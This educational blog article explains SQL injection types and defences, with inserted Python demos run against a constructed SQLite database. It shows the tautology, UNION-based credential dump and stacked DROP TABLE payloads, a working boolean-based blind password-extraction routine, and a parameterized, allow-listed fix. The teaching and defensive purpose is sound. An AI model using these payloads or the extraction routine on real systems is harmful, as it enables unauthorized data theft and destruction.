
What Is SQL Injection? How to Protect against SQL Injection Attacks?

  • Writer: Meta IT Pro
  • Sep 11, 2024
  • 5 min read


SQL Injection (SQLi) is an injection attack in which attacker-supplied input is interpreted as part of an SQL statement sent to the database behind a web application. Attackers exploit SQL Injection vulnerabilities to bypass application security controls: they can sidestep authentication and authorization for a web page or web application and read data from the entire SQL database. They can also use SQL Injection to add, modify, or delete records in the database.


An SQL Injection vulnerability can affect any website or web application that uses an SQL database, such as MySQL, Oracle, SQL Server, and many others. Attackers exploit it to gain unauthorized access to private data such as customer records. SQL Injection is one of the oldest, most common, and most dangerous web application vulnerabilities.


Types of SQL Injections:


SQL injections are usually classified into three categories: in-band SQLi (classic), inferential SQLi (blind), and out-of-band SQLi.


1. In-band SQLi:


The attacker uses the same communication channel both to launch the attack and to collect its results. In-band SQLi's simplicity and efficiency make it the most common kind of SQLi attack. There are two variations of this technique:


  • Error-based SQLi:


The attacker performs actions that cause the database to produce errors. The attacker then uses the details in the error messages (table or column names, the database version, the text of the failing query) to learn about the structure of the database.


  • Union-based SQLi:


This technique uses the UNION SQL operator to combine the results of several SELECT statements into one result set, which the application then returns in the same HTTP response. That response may contain data the attacker was never meant to see, such as rows from other tables.


2. Inferential (Blind) SQLi:


The attacker sends payloads and observes the server's responses and behaviour to infer the structure of its data. The technique is called "blind" SQLi because no data is transferred from the database to the attacker through the web application's response; instead of reading the data directly as in an in-band attack, the attacker must deduce it one true/false question at a time.


  • Boolean-based:


The attacker sends an SQL query that makes the application behave differently depending on whether an injected condition is true or false. The content of the HTTP response changes, or stays the same, accordingly, and the attacker reads that difference as one bit of information about the data. Repeating this with a series of conditions recovers the data piece by piece.


  • Time-based:


The attacker sends an SQL query that instructs the database to wait (for example, with a sleep or delay function) before responding, but only if an injected condition is true. Whether the HTTP response arrives immediately or after the delay tells the attacker whether the condition held, even when the response body itself never changes.
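As an added example that is not code from the original article, the following Python script simulates a boolean-based blind attack against a constructed SQLite database. The vulnerable page only reveals whether an item exists (one bit per request), yet the attacker recovers the admin password one character at a time by binary-searching each character's code point with injected true/false conditions. The table and column names, the item_exists function, the sample rows, and the use of SQLite's unicode() and substr() functions are all assumptions made for this demonstration.

```python
import sqlite3

# Constructed sample schema (not from the original article): the product table
# the page queries and a Users table the attacker should never be able to read.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Items (ItemNumber INTEGER, ItemName TEXT);
        INSERT INTO Items VALUES (999, 'Widget');
        CREATE TABLE Users (Username TEXT, Password TEXT);
        INSERT INTO Users VALUES ('admin', 's3cret');
    """)
    return conn


def item_exists(conn: sqlite3.Connection, itemid: str) -> bool:
    """Vulnerable page (hypothetical): itemid is concatenated into the query
    and the only thing the response reveals is whether any row matched."""
    sql = "SELECT ItemName FROM Items WHERE ItemNumber = " + itemid
    return conn.execute(sql).fetchone() is not None


def blind_extract(oracle, column: str, table: str, where: str, max_len: int = 32) -> str:
    """Boolean-based blind extraction.

    For each character position, ask the oracle "is the code point >= mid?"
    and binary-search the range 0..127 (7 requests per character).
    coalesce(..., 0) turns the NULL that SQLite returns for a position past
    the end of the string into 0, which no mid >= 1 satisfies, so a
    recovered value of 0 marks the end of the secret."""
    secret = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                     # invariant: code point is in [lo, hi]
        while lo < hi:
            mid = (lo + hi + 1) // 2
            # Injected into the WHERE clause as: 999 AND (<scalar subquery>) >= mid
            payload = (
                f"999 AND (SELECT coalesce(unicode(substr({column}, {pos}, 1)), 0) "
                f"FROM {table} WHERE {where}) >= {mid}"
            )
            if oracle(payload):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:
            break
        secret += chr(lo)
    return secret


def demo() -> tuple:
    """Run the attack; returns (recovered password, number of requests used)."""
    conn = make_db()
    count = [0]

    def oracle(itemid: str) -> bool:
        count[0] += 1                       # one HTTP request per question
        return item_exists(conn, itemid)

    secret = blind_extract(oracle, "Password", "Users", "Username = 'admin'")
    return secret, count[0]


if __name__ == "__main__":
    print(demo())
```

Every request returns either the item page or an empty page; the password never appears in any response, which is why the attack is "blind". The request count (7 per character plus 7 to detect the end) is also the signal a detection rule would look for: many near-identical requests to one endpoint that differ only in a numeric comparison.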


3. Out-of-band SQLi:


This kind of attack is only possible when certain features are enabled on the database server used by the web application. It is usually used as an alternative when the in-band and inferential SQLi methods are not practical.


Out-of-band SQLi is used when the attacker cannot use the same channel to launch the attack and gather the results, or when the server is too slow or unstable for time-based inference to be reliable. These techniques rely on the database server's ability to make DNS or HTTP requests, which carry the data to a host the attacker controls.


SQL Injection Example:


An attacker performing SQL injection manipulates a normal SQL query to exploit unvalidated input in a database-driven application. There are many ways this attack vector can be executed; several are shown here to give a general idea of how SQLi works.


Suppose a product page reads the item number from the URL and inserts it into a query. A request such as http://www.estore.com/items/items.asp?itemid=999 pulls information for a specific product; an attacker can alter it to http://www.estore.com/items/items.asp?itemid=999 or 1=1.


As a result, the corresponding SQL query becomes:


SELECT ItemName, ItemDescription
FROM Items
WHERE ItemNumber = 999 OR 1=1


Since 1=1 is always true, the WHERE clause matches every row, and the query returns the names and descriptions of all products in the table, including those the user is not entitled to see.


Attackers can also take advantage of incorrectly filtered characters to alter SQL commands, for instance using a semicolon to end one statement and start another (a "stacked query"), where the database driver accepts several statements in one call.


For example, the input http://www.estore.com/items/items.asp?itemid=999; DROP TABLE Users would generate the following SQL query:


SELECT ItemName, ItemDescription
FROM Items
WHERE ItemNumber = 999; DROP TABLE Users


As a result, the entire Users table, and with it every account, is deleted.


Another way SQL queries can be manipulated is with a UNION SELECT statement, which combines the results of two otherwise unrelated SELECT queries so that rows from a different table are returned alongside the expected result. The two SELECTs must return the same number of columns with compatible types, which is why the attacker pairs Username and Password with ItemName and ItemDescription.


For example, the input http://www.estore.com/items/items.asp?itemid=999 UNION SELECT Username, Password FROM Users produces the following SQL query:


SELECT ItemName, ItemDescription
FROM Items
WHERE ItemNumber = 999 UNION SELECT Username, Password FROM Users


The UNION SELECT combines the request for item 999's name and description with a second query that returns the username and password of every user in the database, and the application renders both in the same response.
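As an added example that is not from the original article, here is a Python/SQLite version of the three manipulations just described, run against a constructed set of tables. fetch_item_vulnerable reproduces the string concatenation behind the ASP page. The stacked DROP TABLE is sent through executescript because Python's plain execute() refuses more than one statement per call, whereas the ADO/SQL Server stack implied by the .asp example accepts such batches. Table contents and function names are assumptions.

```python
import sqlite3

# Constructed sample data (not from the original article): the Items table the
# page queries plus a Users table holding credentials.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Items (ItemNumber INTEGER, ItemName TEXT, ItemDescription TEXT);
        INSERT INTO Items VALUES (999, 'Widget', 'A widget'),
                                 (1000, 'Gadget', 'Internal SKU, not public');
        CREATE TABLE Users (Username TEXT, Password TEXT);
        INSERT INTO Users VALUES ('admin', 's3cret'), ('bob', 'hunter2');
    """)
    return conn


def fetch_item_vulnerable(conn: sqlite3.Connection, itemid: str) -> list:
    """The pattern the article describes: the itemid query-string value is
    concatenated straight into the SQL text, so it is parsed as SQL."""
    sql = ("SELECT ItemName, ItemDescription FROM Items "
           "WHERE ItemNumber = " + itemid)
    return conn.execute(sql).fetchall()


def run_stacked_vulnerable(conn: sqlite3.Connection, itemid: str) -> None:
    """Same concatenation, sent through an API that accepts a batch of
    statements (executescript stands in for a driver like classic ADO)."""
    sql = ("SELECT ItemName, ItemDescription FROM Items "
           "WHERE ItemNumber = " + itemid)
    conn.executescript(sql)


def table_exists(conn: sqlite3.Connection, name: str) -> bool:
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


def demo() -> dict:
    """Run the three payloads from the article against the constructed DB."""
    conn = make_db()
    out = {}
    out["normal"] = fetch_item_vulnerable(conn, "999")
    # Tautology: WHERE ItemNumber = 999 OR 1=1 matches every row.
    out["tautology"] = fetch_item_vulnerable(conn, "999 OR 1=1")
    # UNION: two columns from Users are appended to the product result.
    out["union"] = fetch_item_vulnerable(
        conn, "999 UNION SELECT Username, Password FROM Users")
    # Stacked query: the second statement drops the Users table.
    run_stacked_vulnerable(conn, "999; DROP TABLE Users")
    out["users_table_after_drop"] = table_exists(conn, "Users")
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Note that the UNION payload works here only because Items exposes exactly two columns of text; against a real target the attacker first probes the column count (for example with ORDER BY n or UNION SELECT NULL, NULL, ...) until the query stops erroring.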


How to Protect Against SQL Injection Attacks?


When building a website or application, implement controls that limit its exposure to SQL injection. The following measures are the most effective ways to stop SQL injection attacks:


  • Install the latest application and security updates from your vendors as soon as they become available.


  • Give accounts that connect to the SQL database only the privileges they need (least privilege); a web application account rarely needs DROP, ALTER, or access to tables belonging to other applications.


  • Do not share one database between different applications and websites.


  • Validate every kind of user input, including values from drop-down menus and hidden form fields, because anything the browser sends can be altered by the client.


  • Log database errors on the server instead of sending them to the client's web browser.


  • Use prepared statements with parameterized queries, which fix the complete SQL text up front and pass every user-supplied value as a separate parameter, so that an attacker cannot change the intent of the query afterwards.


  • Use stored procedures, which keep parameterized SQL statements in the database itself and are called directly from the application. Note that a stored procedure that builds dynamic SQL from its arguments is just as injectable as application code.


  • Validate input against an allow list, so that only values matching the expected format ever reach the query.


  • Escape all user input before inserting it into a query so that it cannot be confused with SQL code written by the developer. Treat escaping as a fallback rather than the main defence, since the correct rules differ per database and per context; parameterization is the primary control.


In general, companies should avoid shared accounts so that an attacker who compromises one account does not gain further access to the database. It is also recommended that organizations avoid sending database errors to the client's browser, because attackers can use that information to learn technical details of the database.
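The hardened counterpart, added here as an example and not the article's own code: the product lookup rewritten with an allow-list check, a parameterized query, and server-side error logging, run against the same kind of constructed SQLite tables. A second function binds the raw input without any validation to show that a bound parameter is always treated as a value, never as SQL. The schema, the ITEMID_RE pattern and the function names are assumptions for the demonstration; SQLite has no per-user privileges, so the least-privilege item is not shown here.

```python
import logging
import re
import sqlite3

log = logging.getLogger("estore")

# Constructed sample data (not from the original article).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Items (ItemNumber INTEGER, ItemName TEXT, ItemDescription TEXT);
        INSERT INTO Items VALUES (999, 'Widget', 'A widget');
        CREATE TABLE Users (Username TEXT, Password TEXT);
        INSERT INTO Users VALUES ('admin', 's3cret');
    """)
    return conn


# Allow list (assumed format): an item number is 1 to 10 ASCII digits, nothing else.
ITEMID_RE = re.compile(r"^[0-9]{1,10}$")


def fetch_item_safe(conn: sqlite3.Connection, itemid: str) -> tuple:
    """Validated, parameterized lookup (hypothetical hardened page).

    Returns (rows, error_code). The SQL text is fixed at development time;
    the value travels to the driver separately as a bound parameter.
    Database exceptions are logged on the server and reduced to an opaque
    code for the client, so nothing about the schema leaks in responses."""
    if not ITEMID_RE.match(itemid):
        return [], "invalid_item_id"
    sql = "SELECT ItemName, ItemDescription FROM Items WHERE ItemNumber = ?"
    try:
        return conn.execute(sql, (int(itemid),)).fetchall(), None
    except sqlite3.Error:
        log.exception("item lookup failed for itemid=%r", itemid)
        return [], "lookup_failed"


def fetch_item_param_only(conn: sqlite3.Connection, itemid: str) -> list:
    """No validation at all, only parameterization: the raw string is bound,
    so '999 OR 1=1' is compared against ItemNumber as one literal value and
    never parsed as SQL. SQLite still converts a clean '999' to the integer
    999 through type affinity, so normal lookups keep working."""
    sql = "SELECT ItemName, ItemDescription FROM Items WHERE ItemNumber = ?"
    return conn.execute(sql, (itemid,)).fetchall()


def demo() -> dict:
    """Replay the article's payloads against the hardened lookups."""
    conn = make_db()
    return {
        "normal": fetch_item_safe(conn, "999"),
        "tautology": fetch_item_safe(conn, "999 OR 1=1"),
        "union": fetch_item_safe(conn, "999 UNION SELECT Username, Password FROM Users"),
        "stacked": fetch_item_safe(conn, "999; DROP TABLE Users"),
        "param_only_normal": fetch_item_param_only(conn, "999"),
        "param_only_payload": fetch_item_param_only(conn, "999 OR 1=1"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The allow list rejects the three payloads before any SQL is built, and the parameterized query makes the lookup safe even when the allow list is missing, which is the defence-in-depth the list above calls for. The only thing the client ever sees on failure is a short error code; the stack trace and query text stay in the server log.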

